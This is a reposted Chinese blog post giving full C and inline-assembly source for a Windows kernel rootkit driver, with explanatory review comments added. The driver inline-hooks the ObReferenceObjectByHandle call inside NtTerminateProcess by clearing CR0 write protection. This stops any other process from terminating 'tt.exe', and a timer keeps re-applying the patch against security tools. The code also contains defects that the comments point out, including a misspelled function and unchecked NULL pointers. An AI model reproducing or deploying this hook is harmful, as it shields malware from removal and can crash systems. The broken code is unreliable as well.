
驱动学习----RootKits---InlineHook

2012-01-01 22:29 204 查看

from:http://blog.sina.com.cn/s/blog_61d65e360100o5lx.html

驱动学习----RootKits---InlineHook(原创)

(2011-01-03 11:03:22)




InlineHook ----ObReferenceObjectByHandle

///Inline_Hook ObReferenceObjectByHandle

// By Yankai cleveise Auti Micropoint 360safe IceSword ....

////////////////////////////////////

#include <ntddk.h>

// Status value defined locally (not taken from ntstatus.h) and returned by
// MYObReferenceObjectByHandle to refuse a reference to the protected process.
#define STATUS_WARNING ((NTSTATUS)0x80000000L)

// Section-placement helpers in the usual WDK sample style. Only LOCKEDCODE is
// used in this file (on DPCFUN); the others are unused here.
#define PAGEDCODE code_seg("PAGE")

#define LOCKEDCODE code_seg()

#define INITCODE code_seg("INIT")

#define PAGEDDATA data_seg("PAGE")

#define LOCKEDDATA data_seg()

#define ININDATA data_seg("INIT")

// Local copy of the (undocumented) kernel loader module-list entry layout.
// DriverEntry treats the pointer it reads at +0x14 of the driver object as one
// of these and walks InLoadOrderLinks from it. Only InLoadOrderLinks, DllBase
// and BaseDllName are read in this file; the remaining fields are carried
// only so those three land at the right offsets for the targeted 32-bit
// build — TODO confirm against the kernel actually running.
typedef struct _LDR_DATA_TABLE_ENTRY{

// Walked by DriverEntry (Flink) to enumerate loaded modules.
LIST_ENTRY InLoadOrderLinks;

LIST_ENTRY InMemoryOrderLinks;

LIST_ENTRY InInitializationOrderLinks;

// Read by DriverEntry as the image base of ntoskrnl.exe once found.
PVOID DllBase;

PVOID EntryPoint;

ULONG SizeOfImage;

UNICODE_STRING FullDllName;

// Compared (case-insensitively) with "ntoskrnl.exe" in DriverEntry.
UNICODE_STRING BaseDllName;

ULONG Flags;

USHORT LoadCount;

USHORT TlsIndex;

LIST_ENTRY HashLinks;

PVOID SectionPointer;

ULONG CheckSum;

// Name as written in the original; not referenced in this file.
ULONG TimeDataStamp;

PVOID LoadedImports;

PVOID EntryPointActivationContext;

PVOID PatchInformation;

}LDR_DATA_TABLE_ENTRY,*PLDR_DATA_TABLE_ENTRY;

// File-scope hook state shared between DriverEntry, DPCFUN and MyUnload.

// Resolved via MmGetSystemRoutineAddress in DriverEntry; not read anywhere
// else in this file.
ULONG ObReferenceObjectByHandleAddress;

// ntoskrnl base plus a hard-coded RVA (see DriverEntry) — build-specific.
ULONG NtTerminateProcessAddress;

// Original 4-byte call displacement saved before patching; written back by
// MyUnload.
ULONG Recover;

// Address of the patched call displacement inside NtTerminateProcess. Stays
// NULL until DriverEntry's byte-pattern scan finds a match.
PULONG InsertAddress;

// Periodic timer and DPC that re-apply the patch (DPCFUN re-arms itself).
KTIMER timer;

KDPC mydpc;

// Timer due time; set to -550000 (relative, 100 ns units = 55 ms) in DriverEntry.
LARGE_INTEGER largeint;

// rel32 displacement from the patched call to RootkitObReferenceObjectByHandle.
LONG RootkitAddress;

// Image name of the process shielded from termination; compared against the
// bytes at EPROCESS+0x174 in MYObReferenceObjectByHandle.
char* ProtectName="tt.exe";

// Driver unload: stops the re-patching timer and writes the saved original
// call displacement back over the patched dword.
// NOTE(review): unlike DPCFUN and DriverEntry, this store is made without
// clearing CR0.WP or raising IRQL. InsertAddress is still NULL if DriverEntry
// returned early at its CheckCode test (DriverUnload is registered before
// that test), in which case this line dereferences NULL.
VOID MyUnload(PDRIVER_OBJECT pdriverobj)

{

KeCancelTimer(&timer);

*InsertAddress=Recover;

}

// Default (non-paged) code section for the DPC routine; timer DPCs run at
// DISPATCH_LEVEL.
#pragma LOCKEDCODE

// Timer DPC: re-writes the hooked call displacement and re-arms the timer
// (every 55 ms, see largeint) — presumably so the patch is re-applied if
// something restores the original bytes. Declared without parameters but
// registered through a cast to PKDEFERRED_ROUTINE in DriverEntry, so the four
// DPC arguments are ignored.
// Detection angle: a recurring write to kernel code performed with CR0.WP
// cleared, from a timer DPC owned by a third-party driver.
VOID DPCFUN()

{

ULONG xxx;

// Clear CR0.WP (bit 16) so the store below is not blocked by page
// protection; the original CR0 value is kept in xxx. cli/sti bracket only
// the CR0 update itself.
_asm

{

cli

push eax;

mov eax,CR0;

// save original CR0
mov xxx,eax;

// 0xFFFEFFFF: clear bit 16 (WP)
and eax,0x0FFFEFFFF;

mov CR0,eax;

pop eax;

sti

};

// Re-apply the relative displacement computed in DriverEntry.
*InsertAddress=(ULONG)RootkitAddress;

// Restore the saved CR0 (re-enables WP).
_asm

{

push eax;

mov eax,xxx;

mov CR0,eax;

pop eax;

};

// Re-arm with the same relative due time.
KeSetTimer(&timer,largeint,&mydpc);

}

// Replacement routine reached from the patched call inside NtTerminateProcess
// (via the RootkitObReferenceObjectByHandle trampoline). Same parameter list
// as ObReferenceObjectByHandle; no return type is declared (implicit int), so
// the NTSTATUS is returned as int.
// Behaviour as written: for process-object lookups it resolves the handle,
// compares the bytes at Process+0x174 with ProtectName, and refuses the
// reference with STATUS_WARNING when the target is the protected process and
// the handle is not the current-process pseudo-handle (HANDLE)-1; every other
// case is passed through to the real ObReferenceObjectByHandle.
MYObReferenceObjectByHandle(

HANDLE Handle,

ACCESS_MASK DesiredAccess,

POBJECT_TYPE ObjectType,

KPROCESSOR_MODE AccessMode,

PVOID *Object,

POBJECT_HANDLE_INFORMATION HandleInformation

)

{

NTSTATUS status;

PEPROCESS Process;

POBJECT_TYPE xx;

// Only lookups of process objects are filtered.
xx=*PsProcessType;

if (xx==ObjectType)

{

// Resolve the handle to an EPROCESS so its image name can be inspected.
// NOTE(review): the callee name on the next line does not match the
// exported ObReferenceObjectByHandle used elsewhere in this file. The
// reference taken here is not released anywhere in this file (no
// ObDereferenceObject), and status is overwritten before it is checked.
status=ObReferenceObjectByHandl(Handle,DesiredAccess,ObjectType,AccessMode,&Process,HandleInformation);

// NOTE(review): 0x174 is a hard-coded EPROCESS offset, presumably
// ImageFileName for one specific 32-bit build — not validated against the
// running kernel. _stricmp makes the name comparison case-insensitive.
if (_stricmp((char*)((char*)Process+0x174), ProtectName) == 0)

{

// (HANDLE)-1 is the current-process pseudo-handle: the protected process
// may still reference itself.
if (Handle==(HANDLE)-1)

{

status=ObReferenceObjectByHandle(Handle,DesiredAccess,ObjectType,AccessMode,Object,HandleInformation);

}

else

{

// Any other handle to the protected process is refused with the locally
// defined STATUS_WARNING; *Object is left untouched.
status=STATUS_WARNING;

return status ;

}

}

else

{

// Process object, but not the protected one: pass through unchanged.
status=ObReferenceObjectByHandle(Handle,DesiredAccess,ObjectType,AccessMode,Object,HandleInformation);

}

}

else

{

// Not a process object: pass through unchanged.
status=ObReferenceObjectByHandle(Handle,DesiredAccess,ObjectType,AccessMode,Object,HandleInformation);

}

return status;

}

// Trampoline that the patched call displacement points at. _declspec(naked):
// the compiler emits no prologue/epilogue, only the asm below. No return type
// is declared (implicit int).
// Net effect of the sequence: ebp and esp end up exactly as on entry and
// execution continues at MYObReferenceObjectByHandle, which therefore sees
// the original caller's return address and arguments just as the real callee
// would. The target address is written where `ret` will pop it, and
// `ret 10h` then undoes the 0x10 subtracted from esp. It appears equivalent
// to a plain jmp to MYObReferenceObjectByHandle.
_declspec(naked)RootkitObReferenceObjectByHandle()

{

_asm

{

push ebp;

mov ebp,esp;

sub esp,0x10;

// address of the C replacement routine
mov ebp,MYObReferenceObjectByHandle;

// place it at [esp] so ret picks it up as the "return" address
mov dword ptr [esp],ebp;

// [esp+10h] is the ebp pushed above: restore it
mov ebp,dword ptr [esp+10h];

ret 10h;

};

}

// Driver entry: installs the hook and starts the re-patching timer.
// Steps, as written: (1) walk the loader module list reachable from the
// driver object to find ntoskrnl.exe's base; (2) add a hard-coded RVA to get
// NtTerminateProcess; (3) sanity-check its first bytes and scan forward for
// the pattern 6A 01 FF 75 08 E8 (push 1 / push dword ptr [ebp+8] /
// call rel32); (4) with IRQL raised and CR0.WP cleared, overwrite that call's
// 4-byte displacement so it targets RootkitObReferenceObjectByHandle;
// (5) arm a 55 ms timer whose DPC re-applies the write.
// pRegistryPath is unused. Returns STATUS_SUCCESS on every path (see the
// early `return 0` below).
NTSTATUS DriverEntry(IN PDRIVER_OBJECT pDriverObject,IN PUNICODE_STRING pRegistryPath)

{

NTSTATUS status=STATUS_SUCCESS;

KIRQL oldirql;

UNICODE_STRING ObReferenceObjectByHandleName;

int i;

// Byte pattern searched for inside NtTerminateProcess; the call's 4-byte
// displacement right after the E8 is what gets patched.
char FindCode[]={0x6A,0x01,0xFF,0x75,0x08,0xE8};

// Expected first bytes of NtTerminateProcess: 8B FF 55 (mov edi,edi /
// push ebp), a common hot-patchable prologue — so this is only a weak check
// that the hard-coded RVA landed on the intended function.
char CheckCode[]={0x8B,0xFF,0x55};

LONG Offset;

// Saved CR0 value around the patch write.
LONG uAttr;

// NOTE(review): RVA of NtTerminateProcess for one specific ntoskrnl build;
// nothing here checks the kernel version, so on another build the CheckCode
// test either fails or matches some other function with the same prologue.
ULONG NtTerminateProcessOffset=0x0F1C2A;

char* PointYK;

PULONG DriverAddress;

PULONG DriverSection;

PLIST_ENTRY plistbegin;

PLIST_ENTRY plistend;

PLDR_DATA_TABLE_ENTRY pldr;

UNICODE_STRING DllName;

// NOTE(review): only assigned if ntoskrnl.exe is found in the loop below;
// otherwise it is read uninitialized where NtTerminateProcessAddress is set.
ULONG ntoskrnladdr;

UNICODE_STRING filename;

// Negative due time = relative, in 100 ns units: 550000 -> 55 ms.
largeint.QuadPart=-550000;

RtlInitUnicodeString(&filename,L"ntoskrnl.exe");

RtlInitUnicodeString(&ObReferenceObjectByHandleName,L"ObReferenceObjectByHandle");

// DPCFUN is declared with no parameters; the cast hides the
// PKDEFERRED_ROUTINE signature mismatch.
KeInitializeDpc(&mydpc,(PKDEFERRED_ROUTINE)DPCFUN,NULL);

KeInitializeTimer(&timer);

// Registered before the hook is known to be installed (see MyUnload).
pDriverObject->DriverUnload=MyUnload;

// Resolved here but not read anywhere else in this file.
ObReferenceObjectByHandleAddress=(ULONG)MmGetSystemRoutineAddress(&ObReferenceObjectByHandleName);

// Read the pointer at +0x14 of the driver object — presumably
// DRIVER_OBJECT.DriverSection (the driver's own loader entry) on 32-bit;
// the struct has a named field for this, so the raw offset is build-specific.
DriverAddress=(ULONG*)pDriverObject;

DriverSection=(ULONG*)(*(ULONG*)((char*)DriverAddress+0x014));

plistbegin=plistend=DriverSection;

pldr=(PLDR_DATA_TABLE_ENTRY)plistbegin;

DllName=pldr->BaseDllName;

// Walk InLoadOrderLinks from the driver's own entry until the list wraps
// back to it, looking for ntoskrnl.exe (case-insensitive compare).
do

{

pldr=(PLDR_DATA_TABLE_ENTRY)(pldr->InLoadOrderLinks.Flink);

DllName=pldr->BaseDllName;

if (RtlCompareUnicodeString(&DllName, &filename,TRUE) == 0)

{

ntoskrnladdr=(ULONG)(pldr->DllBase);

break;

}

plistend=(PLIST_ENTRY)pldr;

}while(plistbegin!=plistend);

// Build-specific: kernel base + hard-coded RVA.
NtTerminateProcessAddress=ntoskrnladdr+NtTerminateProcessOffset;

PointYK=(char*)NtTerminateProcessAddress;

// Prologue check; see CheckCode above.
if (!(PointYK[0]==CheckCode[0] && PointYK[1]==CheckCode[1] && PointYK[2]==CheckCode[2]))

{

// NOTE(review): 0 is STATUS_SUCCESS, so a failed check still reports a
// successful load with MyUnload registered and InsertAddress still NULL.
return 0;

}

// Scan the first 200 bytes (reads up to PointYK[204]) for FindCode.
for (i=0;i<200;i++)

{

if (PointYK[i]==FindCode[0] && PointYK[i+1]==FindCode[1] && PointYK[i+2]==FindCode[2] && PointYK[i+3]==FindCode[3] && PointYK[i+4]==FindCode[4] && PointYK[i+5]==FindCode[5])

{

// Points at the call's 4-byte displacement (immediately after the E8).
InsertAddress=(PULONG)(PointYK+i+6);

// Original displacement, written back by MyUnload.
Recover=(ULONG)*InsertAddress;

// A rel32 displacement is target minus the address of the following
// instruction, i.e. InsertAddress+4.
Offset=(ULONG)InsertAddress+4;

RootkitAddress=(ULONG)RootkitObReferenceObjectByHandle-Offset;

break;

}

}

// NOTE(review): if the pattern was not found within 200 bytes, InsertAddress
// is still NULL and the store below dereferences it.
// Patch at DISPATCH_LEVEL with CR0.WP (bit 16) cleared — same sequence as
// DPCFUN; the original CR0 is kept in uAttr.
oldirql=KeRaiseIrqlToDpcLevel();

_asm

{

cli

push eax;

mov eax,CR0;

// save original CR0
mov uAttr,eax;

// 0xFFFEFFFF: clear bit 16 (WP)
and eax,0x0FFFEFFFF;

mov CR0,eax;

pop eax;

sti

};

// Redirect the call inside NtTerminateProcess to the trampoline.
*InsertAddress=(ULONG)RootkitAddress;

// Restore the saved CR0 (re-enables WP).
_asm

{

push eax;

mov eax,uAttr;

mov CR0,eax;

pop eax;

};

KeLowerIrql(oldirql);

// Start the 55 ms re-patch timer; DPCFUN re-arms it on each run.
KeSetTimer(&timer,largeint,&mydpc);

return status;

}